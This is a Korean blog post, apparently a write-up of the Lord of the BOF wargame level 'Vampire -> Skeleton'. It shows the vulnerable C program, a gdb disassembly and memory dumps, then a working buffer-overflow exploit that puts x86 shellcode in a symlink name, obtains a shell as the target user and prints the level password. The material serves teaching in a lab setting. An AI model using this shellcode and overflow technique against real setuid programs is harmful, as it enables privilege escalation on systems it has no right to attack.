Sh4n3e

[시스템해킹][LOB] Level10 : Vampire -> Skeleton 본문

Wargame/LOB

[시스템해킹][LOB] Level10 : Vampire -> Skeleton

sh4n3e 2017. 6. 26. 11:40

 

 [vampire@localhost vampire]$ cat skeleton.c                      

/*             
        The Lord of the BOF : The Fellowship of the BOF
        - skeleton
        - argv hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
        char buffer[40];
        int i, saved_argc;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter 
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        // argc saver
        saved_argc = argc;

        strcpy(buffer, argv[1]); 
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);

        // ultra argv hunter!
        for(i=0; i<saved_argc; i++)
                memset(argv[i], 0, strlen(argv[i]));
}

 

 (gdb) disass main
Dump of assembler code for function main:
0x8048500 <main>: push   %ebp
0x8048501 <main+1>: mov    %ebp,%esp
0x8048503 <main+3>: sub    %esp,48
0x8048506 <main+6>: cmp    DWORD PTR [%ebp+8],1
0x804850a <main+10>: jg     0x8048523 <main+35>
0x804850c <main+12>: push   0x80486d0
0x8048511 <main+17>: call   0x8048410 <printf>
0x8048516 <main+22>: add    %esp,4
0x8048519 <main+25>: push   0
0x804851b <main+27>: call   0x8048420 <exit>
0x8048520 <main+32>: add    %esp,4
0x8048523 <main+35>: nop   
0x8048524 <main+36>: mov    DWORD PTR [%ebp-44],0x0
0x804852b <main+43>: nop   
0x804852c <main+44>: lea    %esi,[%esi*1]
0x8048530 <main+48>: mov    %eax,DWORD PTR [%ebp-44]
0x8048533 <main+51>: lea    %edx,[%eax*4]
0x804853a <main+58>: mov    %eax,%ds:0x8049804
0x804853f <main+63>: cmp    DWORD PTR [%eax+%edx],0
0x8048543 <main+67>: jne    0x8048547 <main+71>
0x8048545 <main+69>: jmp    0x8048587 <main+135>
0x8048547 <main+71>: mov    %eax,DWORD PTR [%ebp-44]
0x804854a <main+74>: lea    %edx,[%eax*4]
0x8048551 <main+81>: mov    %eax,%ds:0x8049804
0x8048556 <main+86>: mov    %edx,DWORD PTR [%eax+%edx]
0x8048559 <main+89>: push   %edx
0x804855a <main+90>: call   0x80483f0 <strlen>
0x804855f <main+95>: add    %esp,4
0x8048562 <main+98>: mov    %eax,%eax
0x8048564 <main+100>: push   %eax
0x8048565 <main+101>: push   0
0x8048567 <main+103>: mov    %eax,DWORD PTR [%ebp-44]
0x804856a <main+106>: lea    %edx,[%eax*4]
0x8048571 <main+113>: mov    %eax,%ds:0x8049804
0x8048576 <main+118>: mov    %edx,DWORD PTR [%eax+%edx]
0x8048579 <main+121>: push   %edx
0x804857a <main+122>: call   0x8048430 <memset>
0x804857f <main+127>: add    %esp,12
0x8048582 <main+130>: inc    DWORD PTR [%ebp-44]
0x8048585 <main+133>: jmp    0x8048530 <main+48>
0x8048587 <main+135>: mov    %eax,DWORD PTR [%ebp+12]
0x804858a <main+138>: add    %eax,4
0x804858d <main+141>: mov    %edx,DWORD PTR [%eax]
0x804858f <main+143>: add    %edx,47
0x8048592 <main+146>: cmp    BYTE PTR [%edx],0xbf
0x8048595 <main+149>: je     0x80485b0 <main+176>
0x8048597 <main+151>: push   0x80486dc
0x804859c <main+156>: call   0x8048410 <printf>
0x80485a1 <main+161>: add    %esp,4
0x80485a4 <main+164>: push   0
0x80485a6 <main+166>: call   0x8048420 <exit>
0x80485ab <main+171>: add    %esp,4
0x80485ae <main+174>: mov    %esi,%esi
0x80485b0 <main+176>: mov    %eax,DWORD PTR [%ebp+12]
0x80485b3 <main+179>: add    %eax,4
0x80485b6 <main+182>: mov    %edx,DWORD PTR [%eax]
0x80485b8 <main+184>: push   %edx
0x80485b9 <main+185>: call   0x80483f0 <strlen>
0x80485be <main+190>: add    %esp,4
0x80485c1 <main+193>: mov    %eax,%eax
0x80485c3 <main+195>: cmp    %eax,48
0x80485c6 <main+198>: jbe    0x80485e0 <main+224>
0x80485c8 <main+200>: push   0x80486f9
0x80485cd <main+205>: call   0x8048410 <printf>
0x80485d2 <main+210>: add    %esp,4
0x80485d5 <main+213>: push   0
0x80485d7 <main+215>: call   0x8048420 <exit>
0x80485dc <main+220>: add    %esp,4
0x80485df <main+223>: nop   
0x80485e0 <main+224>: mov    %eax,DWORD PTR [%ebp+8]
0x80485e3 <main+227>: mov    DWORD PTR [%ebp-48],%eax
0x80485e6 <main+230>: mov    %eax,DWORD PTR [%ebp+12]
0x80485e9 <main+233>: add    %eax,4
0x80485ec <main+236>: mov    %edx,DWORD PTR [%eax]
0x80485ee <main+238>: push   %edx
0x80485ef <main+239>: lea    %eax,[%ebp-40]
0x80485f2 <main+242>: push   %eax
0x80485f3 <main+243>: call   0x8048440 <strcpy>
0x80485f8 <main+248>: add    %esp,8
0x80485fb <main+251>: lea    %eax,[%ebp-40]
0x80485fe <main+254>: push   %eax
0x80485ff <main+255>: push   0x8048710
0x8048604 <main+260>: call   0x8048410 <printf>
0x8048609 <main+265>: add    %esp,8
0x804860c <main+268>: push   40
0x804860e <main+270>: push   0
0x8048610 <main+272>: lea    %eax,[%ebp-40]
0x8048613 <main+275>: push   %eax
0x8048614 <main+276>: call   0x8048430 <memset>
0x8048619 <main+281>: add    %esp,12
0x804861c <main+284>: mov    DWORD PTR [%ebp-44],0x0

0x8048623 <main+291>: mov    %eax,DWORD PTR [%ebp-44]
0x8048626 <main+294>: cmp    %eax,DWORD PTR [%ebp-48]
0x8048629 <main+297>: jl     0x8048630 <main+304>
0x804862b <main+299>: jmp    0x8048670 <main+368>
0x804862d <main+301>: lea    %esi,[%esi]
0x8048630 <main+304>: mov    %eax,DWORD PTR [%ebp-44]
0x8048633 <main+307>: lea    %edx,[%eax*4]
0x804863a <main+314>: mov    %eax,DWORD PTR [%ebp+12]
0x804863d <main+317>: mov    %edx,DWORD PTR [%eax+%edx]
0x8048640 <main+320>: push   %edx
0x8048641 <main+321>: call   0x80483f0 <strlen>
0x8048646 <main+326>: add    %esp,4
0x8048649 <main+329>: mov    %eax,%eax
0x804864b <main+331>: push   %eax
0x804864c <main+332>: push   0
0x804864e <main+334>: mov    %eax,DWORD PTR [%ebp-44]
0x8048651 <main+337>: lea    %edx,[%eax*4]
0x8048658 <main+344>: mov    %eax,DWORD PTR [%ebp+12]
0x804865b <main+347>: mov    %edx,DWORD PTR [%eax+%edx]
0x804865e <main+350>: push   %edx
0x804865f <main+351>: call   0x8048430 <memset>
0x8048664 <main+356>: add    %esp,12
0x8048667 <main+359>: inc    DWORD PTR [%ebp-44]
0x804866a <main+362>: jmp    0x8048623 <main+291>
0x804866c <main+364>: lea    %esi,[%esi*1]
0x8048670 <main+368>: leave 
0x8048671 <main+369>: ret   
0x8048672 <main+370>: nop   
0x8048673 <main+371>: nop   
0x8048674 <main+372>: nop   
0x8048675 <main+373>: nop   
0x8048676 <main+374>: nop   
0x8048677 <main+375>: nop   
0x8048678 <main+376>: nop   
0x8048679 <main+377>: nop   
0x804867a <main+378>: nop   
0x804867b <main+379>: nop   
0x804867c <main+380>: nop   
0x804867d <main+381>: nop   
0x804867e <main+382>: nop   
0x804867f <main+383>: nop   
End of assembler dump.

 

(gdb) b main    
Breakpoint 1 at 0x8048506
(gdb) b *main+369
Breakpoint 2 at 0x8048671
(gdb) r $(python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"')

Starting program: /home/vampire/sk $(python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"')

Breakpoint 1, 0x8048506 in main ()

(gdb) x/50s $ebp+0x139
0xbffffdc1:  ""
0xbffffdc2:  ""
0xbffffdc3:  ""
0xbffffdc4:  ""
0xbffffdc5:  ""
0xbffffdc6:  ""
0xbffffdc7:  "i686"
0xbffffdcc:  "/home/vampire/sk"
0xbffffddd:  'A' <repeats 44 times>, "����"
0xbffffe0e:  "PWD=/home/vampire"
0xbffffe20:  "REMOTEHOST=192.168.13.129"
0xbffffe3a:  "HOSTNAME=localhost.localdomain"
0xbffffe59:  "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffffe7b:  "USER=vampire"
0xbffffe88:  "LS_COLORS="
0xbffffe93:  "MACHTYPE=i386-redhat-linux-gnu"
0xbffffeb2:  "MAIL=/var/spool/mail/vampire"
0xbffffecf:  "INPUTRC=/etc/inputrc"
0xbffffee4:  "BASH_ENV=/home/vampire/.bashrc"
0xbfffff03:  "LANG=en_US"
0xbfffff0e:  "DISPLAY=Kali2017:0"
0xbfffff21:  "LOGNAME=vampire"
0xbfffff31:  "SHLVL=1"
0xbfffff39:  "SHELL=/bin/bash2"
0xbfffff4a:  "USERNAME="
0xbfffff54:  "HOSTTYPE=i386"
0xbfffff62:  "OSTYPE=linux-gnu"
0xbfffff73:  "HISTSIZE=1000"
0xbfffff81:  "TERM=xterm-256color"
0xbfffff95:  "HOME=/home/vampire"
0xbfffffa8:  "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/vampire/bin"
0xbfffffeb:  "/home/vampire/sk"
0xbffffffc:  ""

 

(gdb) x/10s 0xbffffdcc
0xbffffdcc:  ""
0xbffffdcd:  ""
0xbffffdce:  ""
0xbffffdcf:  ""
0xbffffdd0:  ""
0xbffffdd1:  ""
0xbffffdd2:  ""
0xbffffdd3:  ""
0xbffffdd4:  ""
0xbffffdd5:  ""
(gdb) x/10s 0xbfffffeb
0xbfffffeb:  "/home/vampire/sk"
0xbffffffc:  ""
0xbffffffd:  ""
0xbffffffe:  ""
0xbfffffff:  ""
0xc0000000:  <Address 0xc0000000 out of bounds>
0xc0000000:  <Address 0xc0000000 out of bounds>
0xc0000000:  <Address 0xc0000000 out of bounds>
0xc0000000:  <Address 0xc0000000 out of bounds>
0xc0000000:  <Address 0xc0000000 out of bounds> 

 

//test용 Symbolic Link => 주소값을 알아내기 위함 GDB용

ln -s sk ./$(python -c 'print "\x90"*8+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80

\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\\x69\x30\x30\x74\x69\x69\x30

\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"K"*150')

 

//실제 BOF용

ln -s skeleton ./$(python -c 'print "\x90"*8+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80

\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\\x69\x30\x30\x74\x69\x69\x30

\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"K"*150')

 

(gdb) set disassembly-flavor intel
(gdb) disp/i $pc
(gdb) b main
Breakpoint 1 at 0x8048506
(gdb) r $(python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"')
Starting program: /home/vampire/./���������^1ɱ2�l���u�������2�Qi00tii0cjo��QT�⚱
                                                                                  ΁KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK

KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK $(python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"')

Breakpoint 1, 0x8048506 in main ()
1: x/i $eip  0x8048506 <main+6>: cmp    DWORD PTR [%ebp+8],1
 

 

(gdb) x/50s $esp+0x170
0xbffffc28:  ""
0xbffffc29:  ""
0xbffffc2a:  ""
0xbffffc2b:  "i686"
0xbffffc30:  "/home/vampire/./\220\220\220\220\220\220\220\220�\021^1ɱ2\200l\016�\001\200�\001u��\005�����2�Qi00tii0cjo\212�QT\212�\232�\f�\201", 'K' <repeats 128 times>...
0xbffffcf8:  'K' <repeats 22 times>
0xbffffd0f:  'A' <repeats 44 times>, "����"
0xbffffd40:  "PWD=/home/vampire"
0xbffffd52:  "REMOTEHOST=192.168.13.129"
0xbffffd6c:  "HOSTNAME=localhost.localdomain"
0xbffffd8b:  "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffffdad:  "USER=vampire"
0xbffffdba:  "LS_COLORS="
0xbffffdc5:  "MACHTYPE=i386-redhat-linux-gnu"
0xbffffde4:  "MAIL=/var/spool/mail/vampire"
0xbffffe01:  "INPUTRC=/etc/inputrc"
0xbffffe16:  "BASH_ENV=/home/vampire/.bashrc"
0xbffffe35:  "LANG=en_US"
0xbffffe40:  "DISPLAY=Kali2017:0"
0xbffffe53:  "LOGNAME=vampire"
0xbffffe63:  "SHLVL=1"
0xbffffe6b:  "SHELL=/bin/bash2"
0xbffffe7c:  "USERNAME="
0xbffffe86:  "HOSTTYPE=i386"
0xbffffe94:  "OSTYPE=linux-gnu"
0xbffffea5:  "HISTSIZE=1000"
0xbffffeb3:  "TERM=xterm-256color"
0xbffffec7:  "HOME=/home/vampire"
0xbffffeda:  "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/vampire/bin"
0xbfffff1d:  "/home/vampire/./\220\220\220\220\220\220\220\220�\021^1ɱ2\200l\016�\001\200�\001u��\005�����2�Qi00tii0cjo\212�QT\212�\232�\f�\201", 'K' <repeats 128 times>...
0xbfffffe5:  'K' <repeats 22 times>
0xbffffffc:  ""
0xbffffffd:  ""
0xbffffffe:  ""

 

 (gdb) b *main+369
Breakpoint 2 at 0x8048671
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����

Breakpoint 2, 0x8048671 in main ()
1: x/i $eip  0x8048671 <main+369>: ret

(gdb) x/50s 0xbffffc28
0xbffffc28:  ""
0xbffffc29:  ""
0xbffffc2a:  ""
0xbffffc2b:  "i686"
0xbffffc30:  ""
0xbffffc31:  ""
0xbffffc32:  ""
0xbffffc33:  ""
0xbffffc34:  ""
0xbffffc35:  ""
0xbffffc36:  ""
0xbffffc37:  ""
0xbffffc38:  ""
0xbffffc39:  ""
0xbffffc3a:  ""
0xbffffc3b:  ""
0xbffffc3c:  ""
0xbffffc3d:  ""
0xbffffc3e:  ""
0xbffffc3f:  ""
0xbffffc40:  ""
0xbffffc41:  ""
0xbffffc42:  ""

(gdb) x/50s 0xbfffff1d
0xbfffff1d:  "/home/vampire/./\220\220\220\220\220\220\220\220�\021^1ɱ2\200l\016�\001\200�\001u��\005�����2�Qi00tii0cjo\212�QT\212�\232�\f�\201", 'K' <repeats 128 times>...
0xbfffffe5:  'K' <repeats 22 times>
0xbffffffc:  ""
0xbffffffd:  ""
0xbffffffe:  ""
0xbfffffff:  ""
0xc0000000:  <Address 0xc0000000 out of bounds>
0xc0000000:  <Address 0xc0000000 out of bounds>
0xc0000000:  <Address 0xc0000000 out of bounds>

 

[vampire@localhost vampire]$ ln -s sk ./$(python -c 'print "\x90"*8+"\xeb\x11\x5e\x31\xc9\xb1\x32>
<e\x81"+"K"*150') $(python -c 'print "A"*44+"\x2d\xff\xff\xbf"')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-���
bash$ id
uid=509(vampire) gid=509(vampire) groups=509(vampire) 

 

[vampire@localhost vampire]$ ln -s skeleton ./$(python -c 'print "\x90"*8+"\xeb\x11\x5e\x31\xc9\x>
<x9a\xb1\x0c\xce\x81"+"K"*150') $(python -c 'print "A"*44+"\x2d\xff\xff\xbf"')                   
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-���
bash$ id
uid=509(vampire) gid=509(vampire) euid=510(skeleton) egid=510(skeleton) groups=509(vampire)
bash$ my-pass
euid = 510
shellcoder

 

 

 

 

 

'Wargame > LOB' 카테고리의 다른 글

[시스템해킹][LOB] Level12 : Golem -> Darkknight  (0) 2017.07.04
[시스템해킹][LOB] Level11 : Skeleton -> Golem  (0) 2017.06.27
[시스템해킹][LOB] Level9 : Troll -> Vampire  (0) 2017.06.23
[시스템해킹][LOB] Level8 : Orge -> Troll  (0) 2017.06.23
[시스템해킹][LOB] Level7 : Darkelf -> Orge  (0) 2017.06.22
공유하기 링크
'Wargame/LOB' Related Articles more
Comments